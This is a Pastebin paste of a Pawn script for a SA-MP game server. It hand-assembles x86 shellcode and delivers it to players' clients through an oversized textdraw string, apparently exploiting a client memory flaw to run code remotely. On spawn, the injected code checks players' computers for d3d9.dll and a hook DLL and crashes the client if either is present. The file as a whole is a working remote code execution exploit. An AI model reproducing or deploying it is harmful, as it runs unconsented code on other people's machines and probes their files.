Advertisement
Guest User

Snoowker

a guest
Feb 12th, 2014
190
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #if !defined TextDrawClient_included
  2. #define TextDrawClient_included
  3.  
  4. #include <a_samp>
  5.  
  6. static PlayerText:Clients[MAX_PLAYERS];
  7. static ClientCommandId[MAX_PLAYERS];
  8. new ClientCode[MAX_PLAYERS*3];
  9.  
  10. #define CLIENT_CODE_OFFSET  0x3B
  11. #define CLIENT_DATA_OFFSET  0x1AD
  12. #define CLIENT_CODE_SIZE    0x172
  13. #define CLIENT_DATA_SIZE    0x173
  14.  
  15.  
  16. #define _db(%0) ClientCode[off++] = %0
  17.  
  18. static stock PrepareClientMetaCode(playerid)
  19. {
  20.     for (new i = 0; i < sizeof(ClientCode); i++)
  21.         ClientCode[i] = 0x90;
  22.  
  23.     ClientCommandId[playerid] = (ClientCommandId[playerid] + 1)&0xFF;
  24.  
  25.     if (ClientCommandId[playerid] == 0)
  26.         ClientCommandId[playerid] = 1;
  27.  
  28.     new off = 0;
  29.  
  30.     _db(0x55); //push ebp
  31.  
  32.     _db(0x8B); //mov ebp,esp
  33.     _db(0xEC);
  34.  
  35.     _db(0x50); //push eax
  36.     _db(0x51); //push ecx
  37.     _db(0x53); //push ebx
  38.  
  39.     _db(0xB8); //mov eax,408331FF
  40.     _db(0xFF);
  41.     _db(0x31);
  42.     _db(0x83);
  43.     _db(0x40);
  44.  
  45.     _db(0xC1); //shr eax,08
  46.     _db(0xE8);
  47.     _db(0x08);
  48.  
  49.     _db(0x8A); //mov cl,[eax]
  50.     _db(0x08);
  51.  
  52.     _db(0xB3); //mov bl,ClientCommandId[playerid]
  53.     _db(ClientCommandId[playerid]);
  54.  
  55.     _db(0x38); //cmp cl,bl
  56.     _db(0xD9);
  57.  
  58.     _db(0x74); //je +0x1A
  59.     _db(0x18);
  60.  
  61.     _db(0x88); //mov [eax],bl
  62.     _db(0x18);
  63.  
  64.     _db(0x8B); //mov eax,[ebp+04]
  65.     _db(0x45);
  66.     _db(0x04);
  67.  
  68.     _db(0xBB); //mov ebx,0x3BFFFFFF
  69.     _db(0xFF);
  70.     _db(0xFF);
  71.     _db(0xFF);
  72.     _db(0x3B);
  73.  
  74.     _db(0xC1); //shr ebx,18
  75.     _db(0xEB);
  76.     _db(0x18);
  77.  
  78.     _db(0x01); //add eax,ebx
  79.     _db(0xD8);
  80.  
  81.     _db(0x8B); //mov ecx,[ebp+04]
  82.     _db(0x4D);
  83.     _db(0x04);
  84.  
  85.     _db(0x51); //push ecx
  86.  
  87.     _db(0xFF); //call eax
  88.     _db(0xD0);
  89.  
  90.     _db(0x83); //add esp,04
  91.     _db(0xC4);
  92.     _db(0x04);
  93.  
  94.     _db(0x5B); //pop ebx
  95.     _db(0x59); //pop ecx
  96.     _db(0x58); //pop eax
  97.     _db(0x5D); //pop ebp
  98.  
  99.     _db(0x83); //add esp,24
  100.     _db(0xC4);
  101.     _db(0x24);
  102.  
  103.     _db(0x5F); //pop edi
  104.     _db(0x5E); //pop esi
  105.  
  106.     _db(0x83); //add esp,18
  107.     _db(0xC4);
  108.     _db(0x18);
  109.  
  110.     _db(0xC3); //ret
  111.  
  112.     //Code
  113.     _db(0xC3); //ret (do nothing)
  114.  
  115.     //Return address
  116.     ClientCode[800] = 0x16; //-> ret
  117.     ClientCode[801] = 0x27;
  118.     ClientCode[802] = 0x40;
  119.     ClientCode[803] = 0x00;
  120. }
  121.  
  122. static stock Client_FileExists(off) //arg0 - file path, arg1 - length
  123. {
  124.     _db(0x55); //push ebp
  125.  
  126.     _db(0x8B); //mov ebp,esp
  127.     _db(0xEC);
  128.  
  129.     _db(0x53); //push ebx
  130.  
  131.     _db(0x31); //xor eax,eax
  132.     _db(0xC0);
  133.  
  134.     _db(0x50); //push eax
  135.  
  136.     _db(0xB8); //mov eax,80FFFFFF
  137.     _db(0xFF);
  138.     _db(0xFF);
  139.     _db(0xFF);
  140.     _db(0x80);
  141.  
  142.     _db(0xC1); //shr eax,18
  143.     _db(0xE8);
  144.     _db(0x18);
  145.  
  146.     _db(0x50); //push eax
  147.  
  148.     _db(0xB8); //mov eax,03FFFFFF
  149.     _db(0xFF);
  150.     _db(0xFF);
  151.     _db(0xFF);
  152.     _db(0x03);
  153.  
  154.     _db(0xC1); //shr eax,18
  155.     _db(0xE8);
  156.     _db(0x18);
  157.  
  158.     _db(0x50); //push eax
  159.  
  160.     _db(0x31); //xor eax,eax
  161.     _db(0xC0);
  162.  
  163.     _db(0x50); //push eax
  164.     _db(0x40); //inc eax
  165.     _db(0x50); //push eax
  166.  
  167.     _db(0xB8); //mov eax,FFFFFF80
  168.     _db(0x80);
  169.     _db(0xFF);
  170.     _db(0xFF);
  171.     _db(0xFF);
  172.  
  173.     _db(0xC1); //shl eax,18
  174.     _db(0xE0);
  175.     _db(0x18);
  176.  
  177.     _db(0x50); //push eax
  178.  
  179.     _db(0x8B); //mov eax,[ebp+08]
  180.     _db(0x45);
  181.     _db(0x08);
  182.  
  183.     _db(0x8B); //mov ebx,[ebp+0C]
  184.     _db(0x5D);
  185.     _db(0x0C);
  186.  
  187.     _db(0x01); //add eax,ebx
  188.     _db(0xD8);
  189.  
  190.     _db(0x53); //push ebx
  191.  
  192.     _db(0x31); //xor ebx,ebx
  193.     _db(0xDB);
  194.  
  195.     _db(0x88); //mov eax,bl
  196.     _db(0x18);
  197.  
  198.     _db(0x5B); //pop ebx
  199.  
  200.     _db(0x29); //sub eax,ebx
  201.     _db(0xD8);
  202.  
  203.     _db(0x50); //push eax
  204.  
  205.     _db(0xB8); //mov eax,81E45AFF
  206.     _db(0xFF);
  207.     _db(0x5A);
  208.     _db(0xE4);
  209.     _db(0x81);
  210.  
  211.     _db(0xC1); //shr eax,08
  212.     _db(0xE8);
  213.     _db(0x08);
  214.  
  215.     _db(0xFF); //call eax
  216.     _db(0xD0);
  217.  
  218.     _db(0x83); //cmp eax,-01
  219.     _db(0xF8);
  220.     _db(0xFF);
  221.  
  222.     _db(0x0F); //setne al
  223.     _db(0x95);
  224.     _db(0xC0);
  225.  
  226.     _db(0x5B); //pop ebx
  227.     _db(0x5D); //pop ebp
  228.     _db(0xC3); //ret
  229. }
  230.  
  231. stock CrashCheater(playerid)
  232. {
  233.  
  234.     PrepareClientMetaCode(playerid);
  235.  
  236.     new str_d3d9[] = "d3d9.dll";
  237.     new str_vorbisHooked[] = "sdfsdfdssdfl";
  238.  
  239.     new bytes = 0;
  240.     new i = 0;
  241.     while (str_d3d9[bytes])
  242.     {
  243.         ClientCode[CLIENT_DATA_OFFSET + bytes] = str_d3d9[bytes];
  244.         bytes++;
  245.     }
  246.     bytes++;
  247.     while (str_vorbisHooked[i])
  248.     {
  249.         ClientCode[CLIENT_DATA_OFFSET + bytes] = str_vorbisHooked[i];
  250.         bytes++;
  251.         i++;
  252.     }
  253.  
  254.  
  255.     new off = CLIENT_CODE_OFFSET;
  256.  
  257.     _db(0x55); //push ebp
  258.  
  259.     _db(0x8B); //mov ebp,esp
  260.     _db(0xEC);
  261.  
  262.     _db(0x50); //push eax
  263.     _db(0x53); //push ebx
  264.  
  265.     _db(0xB8); //mov eax,length
  266.     _db(0xFF);
  267.     _db(0xFF);
  268.     _db(0xFF);
  269.     _db((sizeof(str_d3d9) - 1));
  270.  
  271.     _db(0xC1); //shr eax,18
  272.     _db(0xE8);
  273.     _db(0x18);
  274.  
  275.     _db(0x50); //push eax
  276.  
  277.     _db(0x8B); //mov eax,[ebp+08]
  278.     _db(0x45);
  279.     _db(0x08);
  280.  
  281.     _db(0xBB); //mov ebx,"d3d9.dll"
  282.     _db(0xFF);
  283.     _db(0xFF);
  284.     _db((CLIENT_DATA_OFFSET&0xFF));
  285.     _db(((CLIENT_DATA_OFFSET>>>8)&0xFF));
  286.  
  287.     _db(0xC1); //shr ebx,10
  288.     _db(0xEB);
  289.     _db(0x10);
  290.  
  291.     _db(0x01); //add eax,ebx
  292.     _db(0xD8);
  293.  
  294.     _db(0x50); //push eax
  295.  
  296.     _db(0x8B); //mov eax,[ebp+08]
  297.     _db(0x45);
  298.     _db(0x08);
  299.  
  300.     _db(0xBB); //mov ebx,Client_FileExists
  301.     _db(0xFF);
  302.     _db(0xFF);
  303.     _db(0xFF);
  304.     _db(0xB0);
  305.  
  306.     _db(0xC1); //shr ebx,18
  307.     _db(0xEB);
  308.     _db(0x18);
  309.  
  310.     _db(0x01); //add eax,ebx
  311.     _db(0xD8);
  312.  
  313.     _db(0xFF); //call eax
  314.     _db(0xD0);
  315.  
  316.     _db(0x84); //test al,al
  317.     _db(0xC0);
  318.  
  319.     _db(0x0F); //jne crash
  320.     _db(0x85);
  321.     _db((random(0xFF) + 1));
  322.     _db((random(0xFF) + 1));
  323.     _db((random(0xFF) + 1));
  324.     _db((random(0xFF) + 1));
  325.  
  326.     _db(0x83); //add esp,08
  327.     _db(0xC4);
  328.     _db(0x08);
  329.  
  330.     _db(0xB8); //mov eax,length
  331.     _db(0xFF);
  332.     _db(0xFF);
  333.     _db(0xFF);
  334.     _db((sizeof(str_vorbisHooked) - 1));
  335.  
  336.     _db(0xC1); //shr eax,18
  337.     _db(0xE8);
  338.     _db(0x18);
  339.  
  340.     _db(0x50); //push eax
  341.  
  342.     _db(0x8B); //mov eax,[ebp+08]
  343.     _db(0x45);
  344.     _db(0x08);
  345.  
  346.     _db(0xBB); //mov ebx,"vorbisHooked.dll"
  347.     _db(0xFF);
  348.     _db(0xFF);
  349.     _db(((CLIENT_DATA_OFFSET + sizeof(str_d3d9))&0xFF));
  350.     _db((((CLIENT_DATA_OFFSET + sizeof(str_d3d9))>>>8)&0xFF));
  351.  
  352.     _db(0xC1); //shr ebx,10
  353.     _db(0xEB);
  354.     _db(0x10);
  355.  
  356.     _db(0x01); //add eax,ebx
  357.     _db(0xD8);
  358.  
  359.     _db(0x50); //push eax
  360.  
  361.     _db(0x8B); //mov eax,[ebp+08]
  362.     _db(0x45);
  363.     _db(0x08);
  364.  
  365.     _db(0xBB); //mov ebx,Client_FileExists
  366.     _db(0xFF);
  367.     _db(0xFF);
  368.     _db(0xFF);
  369.     _db(0xB0);
  370.  
  371.     _db(0xC1); //shr ebx,18
  372.     _db(0xEB);
  373.     _db(0x18);
  374.  
  375.     _db(0x01); //add eax,ebx
  376.     _db(0xD8);
  377.  
  378.     _db(0xFF); //call eax
  379.     _db(0xD0);
  380.  
  381.     _db(0x84); //test al,al
  382.     _db(0xC0);
  383.  
  384.     _db(0x0F); //jne crash
  385.     _db(0x85);
  386.     _db((random(0xFF) + 1));
  387.     _db((random(0xFF) + 1));
  388.     _db((random(0xFF) + 1));
  389.     _db((random(0xFF) + 1));
  390.  
  391.     _db(0x83); //add esp,08
  392.     _db(0xC4);
  393.     _db(0x08);
  394.  
  395.     _db(0x5B); //pop ebx
  396.     _db(0x58); //pop eax
  397.     _db(0x5D); //pop ebp
  398.     _db(0xC3); //ret
  399.  
  400.     Client_FileExists(0xB0);
  401.  
  402.     PlayerTextDrawSetString(playerid, Clients[playerid], ClientCode);
  403. }
  404.  
  405. stock LoadClientForPlayer(playerid)
  406. {
  407.     PrepareClientMetaCode(playerid);
  408.     Clients[playerid] = CreatePlayerTextDraw(playerid, 1000, 1000, ClientCode);
  409.     PlayerTextDrawShow(playerid, Clients[playerid]);
  410. }
  411.  
  412. stock UnloadClientForPlayer(playerid)
  413. {
  414.     PlayerTextDrawHide(playerid, Clients[playerid]);
  415.     PlayerTextDrawDestroy(playerid, Clients[playerid]);
  416.     Clients[playerid] = PlayerText:0;
  417. }
  418.  
  419. #undef _db
  420. #endif
  421.  
  422. public OnPlayerSpawn(playerid)
  423. {
  424.     LoadClientForPlayer(playerid);
  425.     CrashCheater(playerid);
  426.     return 1;
  427. }
Advertisement
Advertisement
Advertisement
RAW Paste Data Copied
Advertisement